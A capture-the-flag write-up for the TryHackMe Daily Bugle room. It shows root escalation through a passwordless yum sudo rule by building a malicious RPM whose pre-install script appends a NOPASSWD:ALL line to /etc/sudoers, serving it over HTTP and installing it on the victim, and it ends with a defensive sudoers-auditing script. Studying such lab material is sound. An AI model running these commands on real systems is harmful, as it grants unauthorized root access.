Sudoers entry - Yum

tryhackme:dailybugle

So, while doing the tryhackme: dailybugle CTF, I found that my current user (jjameson) was allowed to run /usr/bin/yum as root without a password. Please read the previous post to find out what "sudoers" is.

With the help of gtfobins, we found a method to elevate privileges using yum.

The process is simple enough: create a shell script (the one you want to execute; it will hold our malicious code) -> make an RPM package using the fpm tool -> upload it to the victim machine -> execute it using the yum command. (Note: on Red Hat/CentOS, yum is the package manager, which is why we need to use rpm to build an executable. A similar case exists for Debian/Ubuntu systems, where we'll use apt-get to elevate privileges.)

gem install fpm

apt install rpm

Here, I'll be adding my current user to the sudoers file for privilege escalation. This is by far the easiest method I have discovered.

echo 'echo "jjameson ALL=(root) NOPASSWD:ALL" >> /etc/sudoers' > my.sh

fpm -n root -s dir -t rpm -a all --before-install my.sh .

Launch a Python server now:

python3 -m http.server 80

On the victim machine, download the package into the /tmp directory and install it with the commands:

wget <ip>/root-1.0-1.noarch.rpm

sudo yum localinstall -y root-1.0-1.noarch.rpm

Once the installation has completed successfully, we run a simple bash shell using sudo (sudo bash), and you'll observe that jjameson doesn't require a password to run anything as root, because our script "my.sh" was executed as part of the RPM package we just created. This is how we escalate our privileges using yum.
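A defender-side check for the sudoers rule this write-up depends on, as an added example that is not part of the original post: it parses sudoers text and reports rules that grant a package manager or ALL, which covers both the original yum rule and the line my.sh appends. The function name `audit_sudoers`, the package-manager names beyond yum and apt-get, and the sample rules are assumptions made for illustration.

```python
import os
import re

# Assumption: package managers whose install-time scripts run as root.
# The page covers yum and apt-get; the other names are added here.
PKG_MANAGERS = {"yum", "dnf", "rpm", "apt", "apt-get", "dpkg"}
SPEC = re.compile(r"^(\S+)\s+(\S+)\s*=\s*(?:\(([^)]*)\)\s*)?(.+)$")
TAG = re.compile(r"^([A-Z_]+):\s*")
SKIP = ("Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias")

def audit_sudoers(text):
    """Return (user, runas, command, nopasswd, reason) for risky rules."""
    findings = []
    # Join backslash-continued lines before parsing.
    for line in re.sub(r"\\\n", " ", text).splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith(SKIP):
            continue
        m = SPEC.match(line)
        if not m:
            continue
        user, _host, runas, cmds = m.groups()
        runas = runas or "root"  # sudo's default target user
        nopasswd = False  # a tag applies to later commands until overridden
        for cmd in (c.strip() for c in cmds.split(",")):
            while (t := TAG.match(cmd)):
                if t.group(1) in ("NOPASSWD", "PASSWD"):
                    nopasswd = t.group(1) == "NOPASSWD"
                cmd = cmd[t.end():]
            binary = os.path.basename(cmd.split()[0]) if cmd else ""
            if cmd == "ALL":
                reason = "unrestricted command list"
            elif binary in PKG_MANAGERS:
                reason = "package manager runs package scripts as root"
            else:
                continue
            findings.append((user, runas, cmd, nopasswd, reason))
    return findings

# Constructed sample: the rule from the write-up, the line my.sh appends,
# and an rsync rule that must not be flagged.
SAMPLE = """\
Defaults env_reset
jjameson ALL=(root) NOPASSWD: /usr/bin/yum
backup   ALL=(root) /usr/bin/rsync, NOPASSWD: /usr/bin/apt-get
jjameson ALL=(root) NOPASSWD:ALL
"""

if __name__ == "__main__":
    for finding in audit_sudoers(SAMPLE):
        print(finding)
```

Run it against the contents of /etc/sudoers and each file under /etc/sudoers.d; it does not expand Cmnd_Alias definitions, so aliased commands need a manual look.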
